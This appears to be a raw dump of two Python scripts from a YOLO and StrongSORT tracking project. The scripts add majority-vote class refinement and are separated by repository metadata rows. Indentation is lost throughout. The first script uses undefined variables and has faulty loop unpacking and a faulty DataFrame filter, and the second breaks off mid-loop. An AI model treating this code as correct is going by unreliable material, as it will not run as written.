| 55,616 | Python | .py | 1,064 | 39.87594 | 120 | 0.547124 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,103 | Refinement_module.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/Refinement_module.py | import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import glob
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import torch
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights' # default model.pt path
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov7') not in sys.path:
sys.path.append(str(ROOT / 'yolov7')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from ultralytics.utils.torch_utils import select_device, time_sync
from datasets import LoadImages, LoadStreams
from ultralytics.data.loaders import LoadImagesAndVideos, LoadStreams
from ultralytics.utils import colorstr
from ultralytics.utils.checks import check_file, check_requirements, check_imshow
from ultralytics.utils.ops import non_max_suppression, scale_coords
from ultralytics.utils.plotting import save_one_box
import cv2
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def track_and_refine_classes(outputs, threshold):
refined_labels = {}
# output is a list of detection tuples, where each tuple contains the following elements:
# (x_min, y_min, x_max, y_max, track_id, class_label,confidence)
# ouputs contain the detections for all the objects in the frame
if len(outputs) > 0:
class_counts = {}
total_detections = len(outputs)
for detection in outputs:
# print(detection)
class_label = detection[5]
if class_label not in class_counts:
class_counts[class_label] = 1
else:
class_counts[class_label] += 1
# Determine the majority class and refine labels if necessary
if class_counts:
majority_class = max(class_counts, key=class_counts.get)
majority_frequency = class_counts[majority_class] / total_detections
if majority_frequency >= threshold:
for detection in outputs:
track_id = detection[4]
refined_labels[track_id] = majority_class
return refined_labels
@torch.no_grad()
def run(
source= '0',
# yolo_weights=WEIGHTS / 'yolov8.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
show_vid=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
save_vid=False, # save confidences in --save-txt labels
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
hide_class=False, # hide IDs
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
refinement_enabled=True, # flag to enable or disable refinement
refinement_threshold=0.5, # threshold for refining class labels
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
if is_url and is_file:
source = check_file(source) # download
# # Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# # Load model
device = select_device(device)
detection_df = pd.read_csv('detection_results.csv') # load detection results from csv file in format (video_id,frame_id,x_min, y_min, x_max, y_max, class_label,confidence)
detection_df = detection_df.sort_values(by=['video_id', 'frame_id'])
detection_df = detection_df.reset_index(drop=True)
detection_df['track_id'] = -1
names = detection_df['class_label'].unique() # class names
# WEIGHTS.mkdir(parents=True, exist_ok=True)
# stride = model.stride.max().cpu().numpy() # model stride
# imgsz = check_img_size(imgsz[0], s=stride) # check image size
# Dataloader
if webcam:
show_vid = check_imshow()
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadStreams(source, img_size=imgsz)
nr_sources = len(dataset.sources)
else:
dataset = LoadImagesAndVideos(source)
nr_sources = 1
vid_path, vid_writer, txt_path = [None] * nr_sources, [None] * nr_sources, [None] * nr_sources
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(nr_sources):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * nr_sources
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names] # track colors for each class label
# Run tracking
dt, seen = [0.0, 0.0, 0.0, 0.0], 0
curr_frames, prev_frames = [None] * nr_sources, [None] * nr_sources
# Initialize variables for FPS calculation
start_time = time()
frames_processed = 0
# for frame_idx, (path, im, im0, vid_cap) in enumerate(dataset):
for path, im0s, infos in enumerate(dataset):
if time() - start_time >= 1: # every second
# Calculate FPS
fps = frames_processed / (time() - start_time)
print(f'FPS: {fps:.2f}')
start_time = time()
frames_processed = 0 #
# Increment the number of frames processed
frames_processed += 1
s = ''
t1 = time_sync()
# infos has string in format (f"video {self.count + 1}/{self.nf} (frame {self.frame}/{self.frames}) {path}: ")
# get video id and frame id from infos usign regex
video_id = int(re.search(r'video (\d+)', infos).group(1))
frame_id = int(re.search(r'frame (\d+)', infos).group(1))
print(f'Processing video {video_id} frame {frame_id}')
# get detections for the current frame for the current video
pred = detection_df[detection_df['frame_id'] == frame_id & detection_df['video_id'] == video_id]
t2 = time_sync()
dt[0] += t2 - t1
# Apply NMS
t3 = time_sync()
if pred is not None and len(pred):
pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det)
t4 = time_sync()
dt[1] += t4 - t3
# Process detections
for i, det in enumerate(pred): # detections per image
# txt_file_name = p.stem if not webcam else p.stem + f'_{i}' # Differentiate text file names for multiple videos
# save_path = str(save_dir / p.stem) if not webcam else str(save_dir / p.stem) + f'_{i}' # Differentiate video save paths for multiple videos
seen += 1
if webcam: # nr_sources >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
txt_file_name = p.name
save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.name.split('.')[0] # get folder name containing current img
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
imc = im0.copy() if save_crop else im0 # for save_crop
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# # Rescale boxes from img_size to im0 size
# det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()
# # Print results
# for c in det[:, -1].unique():
# n = (det[:, -1] == c).sum() # detections per class
# s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = det.boxes.xywh
confs = det.boxes.conf
clss = det.boxes.cls
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
dt[3] += t5 - t4
if refinement_enabled:
refined_labels = track_and_refine_classes( outputs[i], refinement_threshold)
# draw boxes for visualization
if len(outputs[i]) > 0:
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
bboxes = output[0:4]
id = output[4]
cls = output[5]
# update class label if refinement is enabled
if refinement_enabled:
cls = refined_labels[id]
if save_txt:
# Append index to differentiate text files for multiple videos
bbox_left = output[0]
bbox_top = output[1]
bbox_w = output[2] - output[0]
bbox_h = output[3] - output[1]
txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{i}.txt'))
with open(txt_path, 'a') as file:
file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
if save_vid or save_crop or show_vid: # Add bbox to image
c = int(cls) # integer class
id = int(id) # integer id
label = None if hide_labels else (f'{id} {names[c]}' if hide_conf else \
(f'{id} {conf:.2f}' if hide_class else f'{id} {names[c]} {conf:.2f}'))
plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
if show_vid:
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print results
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms strong sort update per image at shape {(1, 3, imgsz, imgsz)}' % t)
if save_txt or save_vid:
s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov7.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--show-vid', action='store_true', help='display tracking video results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--save-vid', action='store_true', help='save video tracking results')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
# class 0 is person, 1 is bycicle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--hide-class', default=False, action='store_true', help='hide IDs')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 22,005 | Python | .py | 398 | 44.565327 | 175 | 0.592033 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,104 | Refinement_trackv8.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/Refinement_trackv8.py | import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import glob
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import torch
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
from ultralytics import YOLO
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov7') not in sys.path:
sys.path.append(str(ROOT / 'yolov7')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from ultralytics.utils.torch_utils import select_device, time_sync
from datasets import LoadImages, LoadStreams
from ultralytics.utils import colorstr
from ultralytics.utils.checks import check_file, check_requirements, check_imshow
from ultralytics.utils.ops import non_max_suppression, scale_coords
from ultralytics.utils.plotting import save_one_box
import cv2
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def track_and_refine_classes(outputs, threshold):
refined_labels = {}
# output is a list of detection tuples, where each tuple contains the following elements:
# (x_min, y_min, x_max, y_max, track_id, class_label,confidence)
# ouputs contain the detections for all the objects in the frame
if len(outputs) > 0:
class_counts = {}
total_detections = len(outputs)
for detection in outputs:
# print(detection)
class_label = detection[5]
if class_label not in class_counts:
class_counts[class_label] = 1
else:
class_counts[class_label] += 1
# Determine the majority class and refine labels if necessary
if class_counts:
majority_class = max(class_counts, key=class_counts.get)
majority_frequency = class_counts[majority_class] / total_detections
if majority_frequency >= threshold:
for detection in outputs:
track_id = detection[4]
refined_labels[track_id] = majority_class
return refined_labels
@torch.no_grad()
def run(
source= '0',
yolo_weights=WEIGHTS / 'yolov8.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
show_vid=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
save_vid=False, # save confidences in --save-txt labels
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
hide_class=False, # hide IDs
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
refinement_enabled=True, # flag to enable or disable refinement
refinement_threshold=0.5, # threshold for refining class labels
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
if is_url and is_file:
source = check_file(source) # download
# # Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# # Load model
device = select_device(device)
# WEIGHTS.mkdir(parents=True, exist_ok=True)
model = YOLO(yolo_weights).to(device) # load yolo
names, = model.names,
# stride = model.stride.max().cpu().numpy() # model stride
# imgsz = check_img_size(imgsz[0], s=stride) # check image size
# Dataloader
if webcam:
show_vid = check_imshow()
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadStreams(source, img_size=imgsz)
nr_sources = len(dataset.sources)
else:
dataset = LoadImages(source)
nr_sources = 1
vid_path, vid_writer, txt_path = [None] * nr_sources, [None] * nr_sources, [None] * nr_sources
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(nr_sources):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * nr_sources
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
dt, seen = [0.0, 0.0, 0.0, 0.0], 0
curr_frames, prev_frames = [None] * nr_sources, [None] * nr_sources
# Initialize variables for FPS calculation
start_time = time()
frames_processed = 0
for frame_idx, (path, im, im0s, vid_cap) in enumerate(dataset):
if time() - start_time >= 1:
fps = frames_processed / (time() - start_time)
print(f'FPS: {fps:.2f}')
# Draw FPS on the frame
cv2.putText(im0, f'FPS: {fps:.2f}', (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
# Reset variables for the next FPS calculation interval
start_time = time()
frames_processed = 0
# Increment the number of frames processed
frames_processed += 1
s = ''
t1 = time_sync()
im = torch.from_numpy(im).to(device)
im = im.half() if half else im.float() # uint8 to fp16/32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
dt[0] += t2 - t1
# Inference
visualize = increment_path(save_dir / Path(path[0]).stem, mkdir=True) if visualize else False
pred = model.predict(im, augment=augment, conf=conf_thres, iou=iou_thres,save_crop=save_crop,name=name, project=project,exist_ok=True)
t3 = time_sync()
dt[1] += t3 - t2
# Apply NMS
# pred = non_max_suppression(pred[0], conf_thres, iou_thres, classes, agnostic_nms)
dt[2] += time_sync() - t3
# Process detections
for i, det in enumerate(pred): # detections per image
# txt_file_name = p.stem if not webcam else p.stem + f'_{i}' # Differentiate text file names for multiple videos
# save_path = str(save_dir / p.stem) if not webcam else str(save_dir / p.stem) + f'_{i}' # Differentiate video save paths for multiple videos
seen += 1
if webcam: # nr_sources >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
txt_file_name = p.name
save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.name.split('.')[0] # get folder name containing current img
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
imc = im0.copy() if save_crop else im0 # for save_crop
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# # Rescale boxes from img_size to im0 size
# det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()
# # Print results
# for c in det[:, -1].unique():
# n = (det[:, -1] == c).sum() # detections per class
# s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = det.boxes.xywh
confs = det.boxes.conf
clss = det.boxes.cls
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
dt[3] += t5 - t4
if refinement_enabled:
refined_labels = track_and_refine_classes( outputs[i], refinement_threshold)
# draw boxes for visualization
if len(outputs[i]) > 0:
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
bboxes = output[0:4]
id = output[4]
cls = output[5]
# update class label if refinement is enabled
if refinement_enabled:
cls = refined_labels[id]
if save_txt:
# Append index to differentiate text files for multiple videos
bbox_left = output[0]
bbox_top = output[1]
bbox_w = output[2] - output[0]
bbox_h = output[3] - output[1]
txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{i}.txt'))
with open(txt_path, 'a') as file:
file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
if save_vid or save_crop or show_vid: # Add bbox to image
c = int(cls) # integer class
id = int(id) # integer id
label = None if hide_labels else (f'{id} {names[c]}' if hide_conf else \
(f'{id} {conf:.2f}' if hide_class else f'{id} {names[c]} {conf:.2f}'))
plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
if show_vid:
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
